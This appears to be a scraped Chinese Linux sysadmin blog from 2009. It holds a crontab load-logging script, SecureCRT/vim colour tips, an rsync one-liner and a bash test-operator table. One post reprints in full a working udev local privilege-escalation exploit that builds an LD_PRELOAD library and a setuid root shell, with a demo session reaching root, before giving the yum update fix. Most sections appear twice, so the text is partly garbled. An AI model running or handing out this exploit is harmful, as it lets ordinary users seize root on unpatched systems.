#!/bin/bash
load=`uptime`
shijian=`date +%Y-%m-%d-%T`
file=cpustatus.txt
touch $file
all=`cat $file |wc -l`
printf "$load $shijian\n" >> $file
if [[ $all > 60 ]] ; then
starttime=`cat $file |awk '{print $13}'|sort -r|tail -1`
stoptime=`cat $file |awk '{print $13}'|sort -n|tail -1`
loadavg=`cat $file |awk '{avg1+=$10;avg2+=$11;avg3+=$12}END{print avg1/NR,avg2/NR,avg3/NR}'`
high=`cat $file |awk '{print $10}'|sort -n|tail -1`
low=`cat $file |awk '{print $10}'|sort -r|tail -1`
printf "$starttime \n load average $loadavg \n high $high \n low $low \n $stoptime \n\n" > j
#printf "load average $startus \n" >>j
#mv $f $f.$b
fi
在配合 Crontab
linux crontab命令
Crontab 实例(转)
邮件转发
linux下发送邮件..
load=`uptime`
shijian=`date +%Y-%m-%d-%T`
file=cpustatus.txt
touch $file
all=`cat $file |wc -l`
printf "$load $shijian\n" >> $file
if [[ $all > 60 ]] ; then
starttime=`cat $file |awk '{print $13}'|sort -r|tail -1`
stoptime=`cat $file |awk '{print $13}'|sort -n|tail -1`
loadavg=`cat $file |awk '{avg1+=$10;avg2+=$11;avg3+=$12}END{print avg1/NR,avg2/NR,avg3/NR}'`
high=`cat $file |awk '{print $10}'|sort -n|tail -1`
low=`cat $file |awk '{print $10}'|sort -r|tail -1`
printf "$starttime \n load average $loadavg \n high $high \n low $low \n $stoptime \n\n" > j
#printf "load average $startus \n" >>j
#mv $f $f.$b
fi
在配合 Crontab
linux crontab命令
Crontab 实例(转)
邮件转发
linux下发送邮件..
SecureCRT显示彩色脚本
[ 2009/06/26 16:57 | by selboo ]
在vi 编辑下,显示彩色脚本内容,这样更加方便与修改查看
打开 SecureCRT 选项 => 会话选项 => 仿真 终端选择 "Xterm" 再选中后面的"ANSI Color"
在系统安装 vim
查看是否安装有vim
[selboo@selboo ~]$ rpm -qa |grep vim
vim-enhanced-7.0.109-4.el5_2.4z
vim-minimal-7.0.109-4.el5_2.4z
vim-common-7.0.109-4.el5_2.4z
[selboo@selboo ~]$
确定有的话,直接在/etc/profile文件中加入如下的这一行即可,(不过要重装进入终端才行)
alias vi=vim
第二种方法
1> secureCRT的设置。确保仿真终端类型为linux,并勾选“ANSI颜色选项”。
2> 服务器端的设置。在.bashrc中添加:export TERM=xterm 语句
打开 SecureCRT 选项 => 会话选项 => 仿真 终端选择 "Xterm" 再选中后面的"ANSI Color"
在系统安装 vim
查看是否安装有vim
[selboo@selboo ~]$ rpm -qa |grep vim
vim-enhanced-7.0.109-4.el5_2.4z
vim-minimal-7.0.109-4.el5_2.4z
vim-common-7.0.109-4.el5_2.4z
[selboo@selboo ~]$
确定有的话,直接在/etc/profile文件中加入如下的这一行即可,(不过要重装进入终端才行)
alias vi=vim
第二种方法
1> secureCRT的设置。确保仿真终端类型为linux,并勾选“ANSI颜色选项”。
2> 服务器端的设置。在.bashrc中添加:export TERM=xterm 语句
rsync结合find技巧
[ 2009/06/26 16:39 | by selboo ]
rsync -avpz -e ssh 192.168.1.100:/ `find /home -name "*.sh"` /backupdir
这条指会找到/home 及其子目录下,所有的*.sh文件,并将备分到/backupdir这个目录
这条指会找到/home 及其子目录下,所有的*.sh文件,并将备分到/backupdir这个目录
测试的标志 代表意义
-e 该『档名』是否存在?(常用)
-f 该『档名』是否为档桉(file)?(常用)
-d 该『档名』是否为目录(directory)?(常用)
-b 该『档名』是否为一个 block device 装置?
-c 该『档名』是否为一个 character device 装置?
-S 该『档名』是否为一个 Socket 档桉?
-p 该『档名』是否为一个 FIFO (pipe) 档桉?
-L 该『档名』是否为一个连结档?
-r 侦测该档名是否具有『可读』的属性?
-w 侦测该档名是否具有『可写』的属性?
-x 侦测该档名是否具有『可执行』的属性?
-u 侦测该档名是否具有『SUID』的属性?
-g 侦测该档名是否具有『SGID』的属性?
-k 侦测该档名是否具有『Sticky bit』的属性?
-s 侦测该档名是否为『非空白档桉』?
-nt (newer than)判断 file1 是否比 file2 新
-ot (older than)判断 file1 是否比 file2 旧
-ef 判断 file2 与 file2 是否为同一档桉,可用在判断 hard link 的判定上。 主要意义在判定,两个档桉是否均指向同一个 inode 哩!
-eq 两数值相等 (equal)
-ne 两数值不等 (not equal)
-gt n1 大于 n2 (greater than)
-lt n1 小于 n2 (less than)
-ge n1 大于等于 n2 (greater than or equal)
-le n1 小于等于 n2 (less than or equal)
test -z string 判定字串是否为 0 ?若 string 为空字串,则为 true
test -n string 判定字串是否非为 0 ?若 string 为空字串,则为 false。
注: -n 亦可省略
test str1 = str2 判定 str1 是否等于 str2 ,若相等,则回传 true
test str1 != str2 判定 str1 是否不等于 str2 ,若相等,则回传 false
-a (and)两状况同时成立!例如 test -r file -a -x file,则 file 同时具有 r 与 x 权限时,才回传 true。
-o (or)两状况任何一个成立!例如 test -r file -o -x file,则 file 具有 r 或 x 权限时,就可回传 true。
! 反相状态,如 test ! -x file ,当 file 不具有 x 时,回传 true
-e 该『档名』是否存在?(常用)
-f 该『档名』是否为档桉(file)?(常用)
-d 该『档名』是否为目录(directory)?(常用)
-b 该『档名』是否为一个 block device 装置?
-c 该『档名』是否为一个 character device 装置?
-S 该『档名』是否为一个 Socket 档桉?
-p 该『档名』是否为一个 FIFO (pipe) 档桉?
-L 该『档名』是否为一个连结档?
-r 侦测该档名是否具有『可读』的属性?
-w 侦测该档名是否具有『可写』的属性?
-x 侦测该档名是否具有『可执行』的属性?
-u 侦测该档名是否具有『SUID』的属性?
-g 侦测该档名是否具有『SGID』的属性?
-k 侦测该档名是否具有『Sticky bit』的属性?
-s 侦测该档名是否为『非空白档桉』?
-nt (newer than)判断 file1 是否比 file2 新
-ot (older than)判断 file1 是否比 file2 旧
-ef 判断 file2 与 file2 是否为同一档桉,可用在判断 hard link 的判定上。 主要意义在判定,两个档桉是否均指向同一个 inode 哩!
-eq 两数值相等 (equal)
-ne 两数值不等 (not equal)
-gt n1 大于 n2 (greater than)
-lt n1 小于 n2 (less than)
-ge n1 大于等于 n2 (greater than or equal)
-le n1 小于等于 n2 (less than or equal)
test -z string 判定字串是否为 0 ?若 string 为空字串,则为 true
test -n string 判定字串是否非为 0 ?若 string 为空字串,则为 false。
注: -n 亦可省略
test str1 = str2 判定 str1 是否等于 str2 ,若相等,则回传 true
test str1 != str2 判定 str1 是否不等于 str2 ,若相等,则回传 false
-a (and)两状况同时成立!例如 test -r file -a -x file,则 file 同时具有 r 与 x 权限时,才回传 true。
-o (or)两状况任何一个成立!例如 test -r file -o -x file,则 file 具有 r 或 x 权限时,就可回传 true。
! 反相状态,如 test ! -x file ,当 file 不具有 x 时,回传 true
普通用户通过udev漏洞提升到root权限
[ 2009/06/25 17:30 | by selboo ]
udev权限提示的漏洞,只要有普通用户权限,即可提升到root权限
udev.sh
演示自己看了
修复漏洞
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.16.el5
[selboo@selboo ~]$ yum update udev
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.20.el5_3
udev.sh
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
// execl("/tmp/suid", "suid", (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
chown("/tmp/suid",0,0);
chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
# milw0rm.com [2009-04-20]
/tmp/suid
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
// execl("/tmp/suid", "suid", (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
chown("/tmp/suid",0,0);
chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
# milw0rm.com [2009-04-20]
/tmp/suid
演示自己看了
[selboo@selboo ~]$ id
uid=501(selboo) gid=501(selboo) groups=501(selboo)
[selboo@selboo ~]$ ps -ef |grep udev
root 775 1 0 Jun13 ? 00:00:00 /sbin/udevd -d
selboo 762 31582 0 17:05 pts/1 00:00:00 grep udev
[selboo@selboo ~]$ sh udev.sh 774 # 775-1=774
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.2# id
uid=0(root) gid=0(root) groups=501(selboo)
sh-3.2# ls /root/
cnc.txt cnc1.txt installonlyn.py nginx_log.sh rsync.sh whois
sh-3.2#
uid=501(selboo) gid=501(selboo) groups=501(selboo)
[selboo@selboo ~]$ ps -ef |grep udev
root 775 1 0 Jun13 ? 00:00:00 /sbin/udevd -d
selboo 762 31582 0 17:05 pts/1 00:00:00 grep udev
[selboo@selboo ~]$ sh udev.sh 774 # 775-1=774
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.2# id
uid=0(root) gid=0(root) groups=501(selboo)
sh-3.2# ls /root/
cnc.txt cnc1.txt installonlyn.py nginx_log.sh rsync.sh whois
sh-3.2#
修复漏洞
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.16.el5
[selboo@selboo ~]$ yum update udev
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.20.el5_3
